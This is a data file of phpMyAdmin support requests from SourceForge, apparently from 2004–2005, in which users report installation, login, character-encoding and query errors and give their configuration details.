I need to know how I can establish an additional path for webpages to be executed, beside HTDocs.
Please let me know the file s) I have to change, and the text I have to insert alter.
The additional location should be i.e.
C \Scripts\Websites\Clients on a WinXP system, with sub directories).
Warmest thanks, Sven Original URL https sourceforge.net p phpmyadmin support requests 591 https sourceforge.net p phpmyadmin support requests 591 Original author svenlittkowski","bug"
"24444","2394","Frame Links Don t Work in FireFox.
Clicking on a table or database hyperlink in the left hand database panel does not work; the links are dead.
This is with phpMyAdmin 2.5.6 and FireFox 0.93 on Windows XP Home SP2.
Original URL https sourceforge.net p phpmyadmin support requests 574 https sourceforge.net p phpmyadmin support requests 574 Original author sstringer Found in version 2.5.6","bug"
"24444","2395","IE) Almost constantly refreshing tablestructure page.
When I navigate to the table structure page by clicking on a tablename in the left frame the right frame will load the table structure page.
But it does not show it immediately.
The page is almost constantly refreshing.
This is NOT the case with any other page of this software.
Only on the table structure page.
It is very strange, the page refreshes very quickly.
The page does not have a chance to load, it is interupted from an external frame or script, because I sometimes see non closed html tags.
And after about 150 reloads it simply sais it can t display the requested page normal IE message) I m running Windows XP Professional Internet Explorer 6.0 2600) NOT service pack 1, NOR service pack 2 installed Apache 2.0.50 PHP 4.3.8 MySQL 4.0.21 This problem does not exist in Mozilla Firefox 1.0 The problem does neither occur when I use the same version of phpMyAdmin on a remote server.
Thus only locally.
Deleting the temporary files does not solve the problem.
Original URL https sourceforge.net p phpmyadmin support requests 592 https sourceforge.net p phpmyadmin support requests 592 Original author cheater nl Found in version 2.6.0 rc3","bug"
"24444","2396","i get a problem using 2.6.0 pl2.
i m using php 5.0.2 and mysql 4.1.7 apache 2.0.52,mpm worker.
I get a problem on starting to use phpmyadmin 2.6.0 pl2.
when i enter my phpmyadmin site directory, i get a 404 error and apache s children process crashes.
config.inc.php writed the cfg[ PmaAbsoluteUri ] what i connect; cfg[ OBGzip ] is FALSE.
php.ini zlib.output compression = Off what s wrong?
is it a bug or not supported?
Original URL https sourceforge.net p phpmyadmin support requests 575 https sourceforge.net p phpmyadmin support requests 575 Original author dimvbsf","bug"
"24444","2397","Can t Create New Table.
When I try to create a new table I get tbl create.php Missing parameter db tbl create.php Missing parameter table Thanks Original URL https sourceforge.net p phpmyadmin support requests 576 https sourceforge.net p phpmyadmin support requests 576 Original author starnix17 Found in version 2.6.0 pl2","bug"
"24444","2398","BLOB fields too small.
According to MySQL documentation, data types MEDIUMBLOB and LONGBLOB are supposed to store up to 16MB and 4GB respectively.
But when I try to insert a record containing either type, next to the Browse button it says Max 2,048 KB .
Original URL https sourceforge.net p phpmyadmin support requests 577 https sourceforge.net p phpmyadmin support requests 577 Original author roblewis Found in version 2.6.0 pl1","bug"
"24444","2399","Inserting to joined tables.
Is it possible to insert new records in a form built of linked tables?
I have a DOCUMENT table linked via a doc id field to a PAGE table.
Each DOCUMENT record may contain zero or more records in PAGE.
Can phpMyAdmin create a data entry form that will allow creating a DOCUMENT record, then creating individual PAGE records linked to it, while displaying some of the fields from the corresponding master DOCUMENT record?
Original URL https sourceforge.net p phpmyadmin support requests 578 https sourceforge.net p phpmyadmin support requests 578 Original author roblewis Found in version 2.6.0 pl1","bug"
"24444","2400","InnoDB FOREIGN KEY constraint on table with non alpha name.
I could not create InnoDB FOREIGN KEY constraint on a table which name started with non alpha exclamation mark) probably due to the fact, that constraint name could not start with this symbol and autogenerated name did.
Original URL https sourceforge.net p phpmyadmin support requests 580 https sourceforge.net p phpmyadmin support requests 580 Original author styx123","bug"
"24444","2401","Error on DB or table selection.
I haev tried this in both the most recent stable version and an older version we have installed on our server.
MySQL appears to work perfectly, and shell access is perfect.
If I try to select a DB or a table I get one of two errors depending on what version of phpMyAdmin I am using.
The errors are Missing array or Missing parameter Array The last one is recieved through the newest version of the software.
If anyone has any ideas on how this could be resolved, or if I can even get a more exact error message from MySQL or php or whatever is causing this I would apprecieate it.
Original URL https sourceforge.net p phpmyadmin support requests 597 https sourceforge.net p phpmyadmin support requests 597 Original author ryanmc13","bug"
"24444","2402","MySQL 4.1.2 Password Problem.
If I make a new user in MySQL with phpMyAdmin and I delete the old users, then phpMyAdmin say me 1251 Client does not support authentication protocol requested by server; consider upgrading MySQL client Original URL https sourceforge.net p phpmyadmin support requests 581 https sourceforge.net p phpmyadmin support requests 581 Original author komandar Found in version 2.6.0 rc3","bug"
"24444","2403","Fatal error inserting record.
Got this message Fatal error Maximum execution time of 30 seconds exceeded in Library WebServer Documents frog hill phpMyAdmin libraries string.lib.php on line 79 Was trying to do an insert on an empty table, including loading a 324K JPEG file into a MEDIUMBLOB field.
The data values did seem to get inserted before the crash.
Original URL https sourceforge.net p phpmyadmin support requests 582 https sourceforge.net p phpmyadmin support requests 582 Original author roblewis Found in version 2.6.0 pl1","bug"
"24444","2404","export.php error downloading into IE.
Into export.php, bad header for Internet Explorer when downloading exports header Content Disposition inline; filename= .
filename .
); Causes file to be exported to be displayed on the screen instead of downloading it.
I did the following correction to make this work for sure header Content Disposition attachment; filename= .
filename .
); Please correct it in further release.
Original URL https sourceforge.net p phpmyadmin support requests 583 https sourceforge.net p phpmyadmin support requests 583 Original author tickleman Found in version 2.6.0 pl3","bug"
"24444","2405","friends.
i am problems with phpmyadmin.
hello, friends of phpmyadmin I have problems when I installed phpmyadmin does not show the page of identification of users because?
that I do so that shows Original URL https sourceforge.net p phpmyadmin support requests 600 https sourceforge.net p phpmyadmin support requests 600 Original author donpedrito","bug"
"24444","2406","Creating a new database with PHP My Admin.
I am trying to create a database based on a tab delimited text file I ve exported from Excel.
This database eventually will contain about 2000 records in 20 different files.
I ve already setup PHP My Admin 2.6.0 pl2 and am now in the process of making the database structure.
What is confusing me is whether or not I should use unsigned, binary, or nul, field attributes.
These are the kinds of fields I ve thought of making based on this text file which I ve attached.
1\.
The first field is an float which is a =3 LOG index field 1) 1 2\.
The next field just will be a text to take care of the |08 55|a| 3\.
The next field will be a text to take care of of some value to 1. in each record.
4\.
The next field will be the index field.
I would like though to have some records that skip values in the index.
As you can see for instance the U.S. National Aeronautics and Space Administration is record 20, while NASDA is record 33.
Is it possible to have an auto indexing field that skips records like this, or should I make my index field just a long integer.
I m going to need integers probably up to 1000 in some cases for the index field.
5\.
is just going to be a text field for 1., or , 1. if there are multiple links on that record.
6\.
will have the end value of a multi link record, such as NASA s record 32.
7\.
will be a field just for the lt; A gt; where applicable as text 8\.
will be the link description field text 9\.
will be a text field.
You can see an example of what this database will accomplish in http www.macmaps.com astronomy.php In the past I ve been sorting the records of these files in Excel, and then exporting them as flat text files to my website that is using a guestbook php software I ve modified to show the values like they are in the above link.
Now that I have access to MySQL and PHP My Admin, I d like to make that all work on my own website so that I can add links to the database and remove them.
But the first step is to construct my MySQL tables correctly.
Please tell me if you can help me in this endeavor of constructing those tables with PHPMyadmin?
I m still very new to its structure tools.
Thank you.
Original URL https sourceforge.net p phpmyadmin support requests 584 https sourceforge.net p phpmyadmin support requests 584 Original author cartographer2 Found in version 2.6.0 pl2","enhancement"
"24444","2407","features for linked tables deactivated.
I hope I m missing something obvious here, but I ve been going over this for so long my brain hurts.
No matter what I do, I continue to get the error message The additional Features for working with linked Tables have been deactivated.
To find out why click here I click on that and it tells me this PMA Database ... not OK[ Documentation ] General relation features Disabled Now that details I m using phpMyAdmin 2.6.0 pl3 that wasn t a menu option in the group pull down on this site).
MySQL is 3.23.54 Here s what I ve done in my config.inc.php minus the comments, and I ve changed the names and passwords) i ; cfg[ Servers ][ i][ host ] = localhost ; cfg[ Servers ][ i][ port ] = ; cfg[ Servers ][ i][ socket ] = ; cfg[ Servers ][ i][ connect type ] = tcp ; cfg[ Servers ][ i][ extension ] = mysql ; cfg[ Servers ][ i][ compress ] = FALSE; cfg[ Servers ][ i][ controluser ] = pma ; cfg[ Servers ][ i][ controlpass ] = xxxxxxx ; cfg[ Servers ][ i][ auth type ] = config ; cfg[ Servers ][ i][ user ] = realusername ; cfg[ Servers ][ i][ password ] = xxxxxxx ; cfg[ Servers ][ i][ only db ] = ; cfg[ Servers ][ i][ verbose ] = ; cfg[ Servers ][ i][ pmadb ] = phpmyadmin ; cfg[ Servers ][ i][ bookmarktable ] = pma bookmark ; cfg[ Servers ][ i][ relation ] = pma relation ; cfg[ Servers ][ i][ table info ] = pma table info ; cfg[ Servers ][ i][ table coords ] = pma table coords ; cfg[ Servers ][ i][ pdf pages ] = pma pdf pages ; cfg[ Servers ][ i][ column info ] = pma column info ; cfg[ Servers ][ i][ history ] = pma history ; cfg[ Servers ][ i][ verbose check ] = TRUE; cfg[ Servers ][ i][ AllowDeny ][ order ] = ; cfg[ Servers ][ i][ AllowDeny ][ rules ] = array ); I ran the script to create the phpmyadmin database, and it created all the required tables within it the names of which do match what I have entered in the config file) I ve tried so many things I couldn t possibly list them here, most importantly I think is that I tried all sorts of things with rights for the pma controluser they re currently set to full rights on everything.
I m completely stumped and out of ideas.
Please tell me I missed something very easy.
Thanks!
Original URL https sourceforge.net p phpmyadmin support requests 585 https sourceforge.net p phpmyadmin support requests 585 Original author rtelogic Found in version 2.6.0 pl2","bug"
"24444","2409","Missing table that is not missing!.
I m trying to dump a w3t Posts.sql table with 98257 rows.
When I go to dump Structure and Data, or even just Data, I get an error message saying table does not exist.
What gives?
This is the only way I know how to back up my database.
If there is another way I d certainly appreciate someone letting me know.
I am an extreme novice phpMyAdmin user.
I inherited my website from two Swedish friends nearly four years ago they have since completely disappeared and I m basically flying blind here.
Today is the first day I even got into myadmin.
While I m here, if I upgraded to the newest version of phpMyAdmin, would my old and huge database be overwritten?
Thank you so much, Christa Original URL https sourceforge.net p phpmyadmin support requests 586 https sourceforge.net p phpmyadmin support requests 586 Original author hermitcrabber","bug"
"24444","2410","myphpadmin access privilege problems.
I have installed myphpadmin version 2.6.0 pl3 on our Cobalt RaQ4 Server.
We are running Mysql version 3.23.54 When we access http www.domain.co.uk phpmyadmin we are logged in as admin localhost with no privileges other than access to the test db.
We have to click logout before prompted with a username and password login.
As we host many web sites for clients how do I setup phpmyadmin to prompt for a username and password so the client can login to his website db.
Also how do we setup phpmyadmin so that each web site has its own username password and only access to its own database.
Please help, it would be greatly appreciated.
Many Thanks Andy Original URL https sourceforge.net p phpmyadmin support requests 589 https sourceforge.net p phpmyadmin support requests 589 Original author andyboland","bug"
"24444","2411","cutted values after import.
I ve exported a table from a MySQL 4.0.22 to a MySQL 4.1.7 The problem is that the value of the filds are cutted at sights like xc3xa4 xc3xb6 xc3xbc Original URL https sourceforge.net p phpmyadmin support requests 593 https sourceforge.net p phpmyadmin support requests 593 Original author erik5618 Found in version 2.6.1 rc1","bug"
"24444","2412","Using MySQL5 Lose connection during queries.
I am using Apache 2.0.52, PHP 5.0.3, MySQL 5 and the latest snapshot of phpMyAdmin and running Windows 2000 SP4.
phpMyAdmin is all up and running and works fine with MySQL 4...but when i try it against MySQL 5 when trying to do any sort of query using phpMyAdmin ie.
an update, insert, select or delete) i lose the connection to the MySQL database and receive a windows program error....so for example...i login to the MySQL server, see the list of databases on the server, select a database, then when i click on a table to look at its structure the MySQL connection is lost....this happens when i use either the php mysql or mysqli extension MySQL is setup to use the default my.ini that comes with MySQL my medium.ini)...i have tried just using a basic my.ini with just the basedir and datadir listed but no joy....i dont have any software firewall running on the machine, i am not running either apache or mysql as a service, i am just running them using a console window...mysql is set to the default port 3306 any suggestions are greatly appreciated Original URL https sourceforge.net p phpmyadmin support requests 594 https sourceforge.net p phpmyadmin support requests 594 Original author mike harding Found in version Latest Git snapshot","bug"
"24444","2413","Dump file can t be imported.
Hey, I try to import a dump I made earlier, But the only error message I read when I hit run is File couldn t open .
What I am doing wrong?
I have no probelm to create databes but not to import tables.
Parameter is also set to EGPCS in php.ini Any one can help me?
Kimbo7603 Original URL https sourceforge.net p phpmyadmin support requests 606 https sourceforge.net p phpmyadmin support requests 606 Original author reijfer Found in version 2.6.0 pl3","bug"
"24444","2414","keyword PROCESS interferes with table process .
If your database includes a table named process , then the SQL parser will uppercase that keyword, causing MySQL to fail to query the table with the error 1146 Table aisha.PROCESS doesn t exist EXAMPLE SQL QUERY SELECT FROM process as p,project WHERE p.name= somename WHAT THE PARSER GENERATES TODAY bad) SELECT SQL CALC FOUND ROWS FROM PROCESS AS p, project WHERE p.name = somename LIMIT 1 NOTES If you leave off the ,project part, then somehow you get the right results, even though the query string still has a fully uppercased PROJECT in the query string.
WORKAROUND I have to intentionally quote the word project with back tick characters, so that the parser thinks it s a string and passes it as is to MySQL.
This trick is already used elsewhere by the parser it just needs to be added for the above situation as well.
WHAT THE PARSER SHOULD GENERATE note backticks) SELECT FROM `process` as `p`, project WHERE p.name = somename LIMIT 1 Original URL https sourceforge.net p phpmyadmin support requests 595 https sourceforge.net p phpmyadmin support requests 595 Original author balyoz Found in version 2.6.0 rc2","bug"
"24444","2415","Generating cookies outside of phpMyAdmin.
Similar to support request 818481 bug in cookies auth blowfish.php)?
), I too am generating the cookies via another login page for our multi user system via setcookie lang , en iso 8859 1 ,time ) 86400, phpMyAdmin , our.host.name , 1); setcookie pma cookie username , dbuser ,time ) 86400, phpMyAdmin , our.host.name , 1); setcookie pma cookie password ,base64 encode PMA blowfish encrypt dbpasswd, ourpasswordkey )),time ) 86400, phpMyAdmin , our.host.name , 1); This worked great under 2.5.4.
Due to a MySQL server upgrade to the 4.1 branch, we decided to upgrade phpMyAdmin as well.
However, the above code does not seem to do the trick.
After some analysis, it seems that some additional cookies are getting set in the new version, as well as having the username encoded in some way.
We ve currently got setcookie lang , en iso 8859 1 ,time ) 86400, phpMyAdmin 2.6.0 pl3 , , 1); setcookie pma theme , original ,time ) 86400, phpMyAdmin 2.6.0 pl3 , , 1); setcookie pma collation connection 1 , utf8 general ci ,time ) 86400, phpMyAdmin 2.6.0 pl3 , , 1); setcookie pma cookie username 1 ,PMA blowfish encrypt dbuser, ourpasswordkey ),time ) 86400, phpMyAdmin 2.6.0 pl3 , , 1); setcookie pma cookie password ,base64 encode PMA blowfish encrypt dbpasswd, ourpasswordkey )),time ) 86400, phpMyAdmin 2.6.0 pl3 , , 1); I ve tried to sync it up with what is getting from phpMyAdmin, but something is not right since it keeps prompting for a username password..
Original URL https sourceforge.net p phpmyadmin support requests 596 https sourceforge.net p phpmyadmin support requests 596 Original author wesmoc","bug"
"24444","2416","Table over 300 megabytes.
I have a table with over 300 megabytes and when I try to browse the records in phpmyadmin, apache just locks up.
My php scripts can read the table fine however.
Original URL https sourceforge.net p phpmyadmin support requests 598 https sourceforge.net p phpmyadmin support requests 598 Original author jshpro2","bug"
"24444","2417","Cannot browse date.
Editing record is not working properly.. PHPMyAdmin version 2.6.1 rc1 PHP version 5.0.3 Internet Explorer 6.0 MySQL version 4.0.20a nt Hello there, I have been using phpMyAdmin for some time now and never had any problem with it.
I recently upgraded PHP and MySQL to latest releases.
Reading from your web site, I decided to also upgrade my PMA to your most current version.
While my database and PHP servers are both working fine using my web site, I can not do any browsing of data using PMA.
I can see the structure of all my tables, modify the structure, etc.
However, the Browse results in a timeout page after few minutes.
All tables are INNODB.
Also, if I click on INSERT for a table, the input form for the new record is incorrect.
It displays all the right fields but the input fields have the wrong size and maxlength values as following examples [SessionID T35] value= size= 40 maxlength= 16387 The field SessionID is a varchar 35) [PPLID T40] value= size= 1 maxlength= 1 The field PPLID T40 is a varchar 40) [FirstName T25] value= size= 1 maxlength= 1 The field FirstName T25 is a varchar 25) [Province T3] value= size= 0 maxlength= 0 The field Province T3 is a char 3) Any idea what is causing that?
I attached the source text of the page I get when inserting data and here is my table structure CREATE TABLE `sessions` `SessionID T35` varchar 35) NOT NULL default , `PPLID T40` varchar 40) NOT NULL default , `FirstName T25` varchar 25) NOT NULL default , `LastName T25` varchar 25) NOT NULL default , `SessionStart DT` time NOT NULL default 00 00 00 , `LastAccess DT` time NOT NULL default 00 00 00 , `LastPageViewed T50` varchar 50) NOT NULL default , `SecurityLevel T5` varchar 5) NOT NULL default , `Province T3` char 3) default NULL, `SessionClosed I` tinyint 1) NOT NULL default 0 , PRIMARY KEY `SessionID T35`) ) TYPE=InnoDB Original URL https sourceforge.net p phpmyadmin support requests 599 https sourceforge.net p phpmyadmin support requests 599 Original author easywishes","bug"
"24444","2418","UTF8 encoding display.
Hi, I made a mysql dump of ut8 databases on windows to import it into linux, it worked well.
Then I asked to show it in the console, the utf8 is okay.
But when I use phpMyAdmin, the encoding display is fucked up despite that I have chosen either French utf8 or English utf8 to display the content of tables).
Also, in the Collation column, it gives me a wrong encoding latin1 swedish ci , which has nothing to see with my databases, nor with the language of my system.
Some other people on the IRC told me thay have the same problem.
How to solve it ?
Thanks, Gilles Original URL https sourceforge.net p phpmyadmin support requests 601 https sourceforge.net p phpmyadmin support requests 601 Original author jili","bug"
"24444","2419","ODBC Connection.
Hi, I ve got an experimental site running on one of my computers from where I try all apps, and everything related to Internet Aplications.
So I installed phpMyAdmin and the is a User that has control all over the DataBase Engine, which is ODBC and has no password), and leaves my Databases with a giant crack where anyone can pass, this user is created by the ODBC Driver that mysql gives in their website I think, and the problem is that I can t delete this user, because i doesn t appear anywhere In the Users database, thanks 4 reading.
Original URL https sourceforge.net p phpmyadmin support requests 603 https sourceforge.net p phpmyadmin support requests 603 Original author lomefin","bug"
"24444","2420","Login does not work.
As Group I could not choose 2.6.0 pl3 .. but i have this version.
If I want to login I set auth type to http and user to root ), it does not work.
But if I want to login on my shell to the mysql with my root password, it works, just not in phpmyadmin.
Is it a bug or what can be the reason for this ?
Original URL https sourceforge.net p phpmyadmin support requests 604 https sourceforge.net p phpmyadmin support requests 604 Original author mysteri Found in version 2.6.0 pl3","bug"
"24444","2421","MBString with phpMyAdmin.
the new version 2.6.1 rc2) issues a warning message saying You have mbstring overrides...this may break phpMyAdmin My application running on same php apache instance) requires mbstring overrides Do I REALLY need to setup a separate php apache instance?
If REALLY required, can you remove the mbstring overrides in config.inc.php?
What EXACTLY is the issue of mbstring with phpMyAdmin?
point me to a faq)... e.g..can I ignore it because my whole system is UTF 8) Original URL https sourceforge.net p phpmyadmin support requests 605 https sourceforge.net p phpmyadmin support requests 605 Original author jbarwick","bug"
"24444","2422","MYSQL Service stops on query.
Hello, I m using an IIS6 with PHP 5.0.3 and MySQL 5.0.2 alpha and phpMyAdmin 2.6.1.
First it looks like phpMyAdmin is running well.
Login works and browsing is possible but when I try to add a new user the MySQL Service stops and I receive the following error message SQL Command SHOW COLUMNS FROM `mysql`.`user` ; MySQL 2013 Lost connection to MySQL server during query Same procedure when I use the command in the command line window of MySQL.
Can you help me?
Greetz Jan Original URL https sourceforge.net p phpmyadmin support requests 616 https sourceforge.net p phpmyadmin support requests 616 Original author janlw Found in version 2.6.1 rc2","bug"
"24444","2423","WARNING mysql num rows ) supplied argument is not a vali....
Warning mysql num rows ) supplied argument is not a valid MySQL result resource File libraries dbi mysql.dbi.lib.php Line 217 PHP 5.0.3 Original URL https sourceforge.net p phpmyadmin support requests 607 https sourceforge.net p phpmyadmin support requests 607 Original author netimperia Found in version 2.6.1 rc2","bug"
"24444","2424","Execution time exceeded when uploading large SQL files.
Whenever I try to upload a large SQL file 1.8 mb gzipped), I get this error Fatal error Maximum execution time of 300 seconds exceeded in usr local cpanel base 3rdparty phpMyAdmin libraries read dump.lib.php on line 91 Please use set time limit ) or an htaccess file with a longer max execution time to allow larger sql files to be uploaded and run.
Original URL https sourceforge.net p phpmyadmin support requests 617 https sourceforge.net p phpmyadmin support requests 617 Original author indianduddawg47 Found in version 2.6.0 pl3","bug"
"24444","2425","2.6.x slow as hell....
Since 2.6.0 rc1 phpMyAdmin is about 5 6 times slower than before...it takes about 15 seconds to display my 250 table based database while my 2.3.0 version needs about 2 seconds).
It seems that nearly all actions show table content, show table structure, show results) takes about 5 6 more time than earlier versions ... this is, for me, a knock out criteria ; .
Are there any hints to speed up 2.6.x versions?
Thanks, Ralf Original URL https sourceforge.net p phpmyadmin support requests 608 https sourceforge.net p phpmyadmin support requests 608 Original author klingklang112","bug"
"24444","2426","Main page shows create database wich should not be shown.
I posted a problem before with the underscore, wich used to be normal....
However, when i create the user mediatv , the database blaat blaat , and i log in as mediatv, it seems that phpmyadmin still keeps showing the field where you can create a new database, however... it looks like this user is not able to create one as far as i could test...
Original URL https sourceforge.net p phpmyadmin support requests 609 https sourceforge.net p phpmyadmin support requests 609 Original author djmw Found in version 2.6.1 rc2","bug"
"24444","2427","Is 2.6.1 really 2.48?.
I ve tried all three downloads of v2.6.1 .tar.bz2, .tar.gz, .zip) and each one shows the following in the config.inc.php header Id config.inc.php,v 2.48 2004 12 28 12 48 27 nijel Exp Is this just an incorrect version number in the file, or is this really the 2.48 version?
Original URL https sourceforge.net p phpmyadmin support requests 621 https sourceforge.net p phpmyadmin support requests 621 Original author belzebob Found in version 2.6.1","bug"
"24444","2428",".csv file exports to screen.
Hi, I need some help with issues that have come up since I updated my pc to Windows xp v2 1) exporting a file without compression in ie6 results in it being written to the screen, not offered as open or save this file 2) .csv files exported using ie6 in .zip format are appended with a single quote mark at the beginning of each line.
Have been using phpmyadmin for years no problem.
Have older version 2.5.3 rc2 running as well and have same effect on that one.
Using the latest Opera browser, no problem with saving the file.
However, a single quote is appended to the beginning of each line here too.
Running latest mysql apache Mac no problem, other rig with xp v1 no problem.
Have gone through and adjusted settings on excel, ie6, norton, turned off ms firewall, read tech sheets here and on ms website without success.
Tried the suggested registry hack hkey classes root sql xtext, no go.
Any helpful suggestions?
Original URL https sourceforge.net p phpmyadmin support requests 610 https sourceforge.net p phpmyadmin support requests 610 Original author briancharles Found in version 2.6.1 rc2","bug"
"24444","2429","wrong paramater count and header already sent stuff.
Ok, Basically, I think I ve sucsefully installed phpMyAdmin, so I try to run the following sql query in it CREATE TABLE phpbb store inventory inventory id bigint 8) NOT NULL auto increment, inventory item bigint 8) NOT NULL default 0 , inventory store bigint 8) default NULL, inventory user bigint 8) default NULL, inventory price bigint 8) NOT NULL default 0 , inventory amount bigint 8) NOT NULL default 0 , restock time varchar 255) default NULL, restock amount bigint 8) default NULL, restock last varchar 255) default NULL, UNIQUE KEY item id inventory id) ) TYPE=MyISAM; But when I run that, I get the follow problem Warning Wrong parameter count for rtrim ) in home .sites 123 site117 web phpMyAdmin 2.6.0 pl3 libraries read dump.lib.php on line 23 Warning Cannot add header information headers already sent by output started at home .sites 123 site117 web phpMyAdmin 2.6.0 pl3 libraries read dump.lib.php 23) in home .sites 123 site117 web phpMyAdmin 2.6.0 pl3 libraries header http.inc.php on line 14 Warning Cannot add header information headers already sent by output started at home .sites 123 site117 web phpMyAdmin 2.6.0 pl3 libraries read dump.lib.php 23) in home .sites 123 site117 web phpMyAdmin 2.6.0 pl3 libraries header http.inc.php on line 15 Warning Cannot add header information headers already sent by output started at home .sites 123 site117 web phpMyAdmin 2.6.0 pl3 libraries read dump.lib.php 23) in home .sites 123 site117 web phpMyAdmin 2.6.0 pl3 libraries header http.inc.php on line 16 Warning Cannot add header information headers already sent by output started at home .sites 123 site117 web phpMyAdmin 2.6.0 pl3 libraries read dump.lib.php 23) in home .sites 123 site117 web phpMyAdmin 2.6.0 pl3 libraries header http.inc.php on line 17 Warning Cannot add header information headers already sent by output started at home .sites 123 site117 web phpMyAdmin 2.6.0 pl3 libraries read dump.lib.php 23) in home .sites 123 site117 web phpMyAdmin 2.6.0 pl3 libraries header http.inc.php on line 20 What I think it is, is that the part home .sites 123 site117 web needs to be changed somewhere, but I can not find where to change it Reason I believe this is that I ve had to change simular looking info for other php stuff) I had a difficult time understand the stuff in config.inc.php, so I ve attatched the file, with sensitive info stared ) out.
Any help will be awesome, thanks.
Original URL https sourceforge.net p phpmyadmin support requests 611 https sourceforge.net p phpmyadmin support requests 611 Original author smeep Found in version 2.6.0 pl3","bug"
"24444","2430","Can t create table in IE.
I just installed php, mysql and phpmyadmin on my local win32 pc for localhost testing, and phpmyadmin seems to have some problems in IE.
When I try to create a new table in the database I created, one of two things happen either the page appears unchanged, or there are a couple of clicks indicating 2 page loads as opposed to 1) and I get tbl create.php Missing parameter db tbl create.php Missing parameter table Also, when viewing certain tables in the `mysql` database, including user, phpMyAdmin gets stuck in an infinite loop.
When I tested in Firefox, there were no problems.
I hope this narrows it down.
Tested both config and HTTP auth types.
I m not sure what else I can add to locate the problem.
Let me know if there s anything I can add.
Original URL https sourceforge.net p phpmyadmin support requests 612 https sourceforge.net p phpmyadmin support requests 612 Original author fluffy lobster Found in version 2.6.1","bug"
"24444","2431","MySQL5 compatibility, named pipe, and Secure Auth.
I believe MySQL5 has dropped support for phpMyAdmin and even created error 1251 to discourage the use of phpMyAdmin by saying considering upgrading to a better client .
And they have pushed out MySQLAdmin in winXP gui form.
The security setting cookies, http, or config would not work with MySQL5.
The only known method I ve tried is through Command Prompt.
However, I haven t tried PHP5 and mysqli.
Maybe that s why they re there in 2.6.1. phpMyAdmin documentation needs one section explaining how to install it for MySQL5.
Thanks!
Original URL https sourceforge.net p phpmyadmin support requests 613 https sourceforge.net p phpmyadmin support requests 613 Original author chengyus Found in version Latest Git","bug"
"24444","2432","Is everyone rebuilding PHP with mbstring?.
We are running a MySQL 4.1.9 and PHP 5.0.3.
I just upgraded PhpMyAdmin from 2.6.0 to 2.6.1.
We don t do any customization of charsets collations, but rather use the defaults, for the most part.
So when I brought up 2.6.1 for the first time and got the following error message The mbstring PHP extension was not found and you seem to be using multibyte charset.
Without mbstring extension phpMyAdmin is unable to split strings correctly and it may result in unexpected results.
I had to ask myself, is everyone with the latest versions of MySQL and PhpMyAdmin getting this message?
And if so, are they all just rebuilding PHP with the mbstring extensions?
The system tables in MySQL 4.1.9 use UTF 8.
Is this the reason behind this error?
Thanks.
Leif Original URL https sourceforge.net p phpmyadmin support requests 614 https sourceforge.net p phpmyadmin support requests 614 Original author leifneve","bug"
"24444","2433","2.6.1) german Umlauts not displayed correctly.
since version 2.6.1 the german Umlaute xc3xa4xc3xb6xc3xbc) are not displayed correctly.
The sign amp; 65533; rhomb with an question mark) is displayed instead.
When I change the cfg[ AllowAnywhereRecoding ] from FALSE to TRUE, the output is OK. iconv ext.
is disabled) I havent done any changes to MySQL.
Original URL https sourceforge.net p phpmyadmin support requests 615 https sourceforge.net p phpmyadmin support requests 615 Original author j0erch Found in version 2.6.1","bug"
"24444","2434","php login page errors.
I am getting errors on the login page after I have installed and configured phpmy admin Why am I getting these errors?
Warning Illegal offset type in usr share phpMyAdmin 2.
6.1 libraries grab globals.lib.php on line 54 Warning Illegal offset type in usr share phpMyAdmin 2.
6.1 libraries grab globals.lib.php on line 54 Warning Illegal offset type in usr share phpMyAdmin 2.
6.1 libraries grab globals.lib.php on line 54 Warning Cannot modify header information headers already sent by output started at usr share phpMyAdmin 2.6.1 libraries grab globals.lib.php 54) in usr share phpMyAdmin 2.6.1 libraries auth cookie.auth.
lib.php on line 108 Warning Cannot modify header information headers already sent by output started at usr share phpMyAdmin 2.6.1 libraries grab globals.lib.php 54) in usr share phpMyAdmin 2.6.1 libraries select theme.lib.
php on line 104 Your assistance would be appriciated.
Original URL https sourceforge.net p phpmyadmin support requests 618 https sourceforge.net p phpmyadmin support requests 618 Original author lionslair Found in version 2.6.1","bug"
"24444","2435","doesn t want to drop the tables.
SQL query DROP TABLE 60mantis project category table 60 MySQL said Documentation 1064 You have an error in your SQL syntax near 60mantis project category table 60 at line 1 When i try to drop this table, I get this error.
I assume that 60 is the ` character.
I tried it in multiple browsers ie and FF) and had the same problem.
Original URL https sourceforge.net p phpmyadmin support requests 619 https sourceforge.net p phpmyadmin support requests 619 Original author alex323 Found in version 2.6.1 rc2","bug"
"24444","2436","won t drop multiple tables.
When I click on check all and then select Drop from the box, it gives me the following error db details structure.php Missing parameter db I have tried multiple browsers AND multiple versions.
IE and FF) In addition, I am using sf.net s mysql services.
Original URL https sourceforge.net p phpmyadmin support requests 620 https sourceforge.net p phpmyadmin support requests 620 Original author alex323 Found in version 2.6.1 rc2","bug"
"24444","2437","Problems with transfer of information.
I have reasently installed phpMyAdmin 2.6.1, but can not get it to work.
I get connected to the server and DB, and can browse the tables in the DB, but if i try to create a table or insert a column, i get the following error tbl addfield.php Missing parameter db tbl addfield.php Missing parameter table or similar with tbl create.php) If I try to run a SQL query in phpMyAdmin, i get the message No SQL query!
I have tried to make a simple script using forms post method) and accessing information in the DB, and everything works OK for this script.
From one of the previous support requests, got the tip to set cfg[ OBGzip ] = FALSE; But this did not help either.
Server details Linux 2.4.29 running with Apache 1.3.33 MySQL 4.1.9 PHP 4.3.10 Any tips?
Original URL https sourceforge.net p phpmyadmin support requests 622 https sourceforge.net p phpmyadmin support requests 622 Original author martisol Found in version 2.6.1","bug"
"24444","2438","Swedish???.
1267 Illegal mix of collations latin1 swedish ci,IMPLICIT) and utf8 general ci,COERCIBLE) for operation = I ve collated all our databases with utf8 general ci As well as all the tables in each DB took a good 30 minutes).
I still get this error.
Mysql works fine on the public side, but i cannot use PHPmyadmin to browse or do anything.
Is there a quick way to remove all this Swedish stuff?
Original URL https sourceforge.net p phpmyadmin support requests 623 https sourceforge.net p phpmyadmin support requests 623 Original author peeb","bug"
"24444","2439","Error encountered while querying from file.
Importing a file saved using the export function, I ve encountered the following error There is a chance that you may have found a bug in the SQL parser.
Please examine your query closely, and check that the quotes are correct and not mis matched.
Other possible failure causes may be that you are uploading a file with binary outside of a quoted text area.
You can also try your query on the MySQL command line interface.
The MySQL server error output below, if there is any, may also help you in diagnosing the problem.
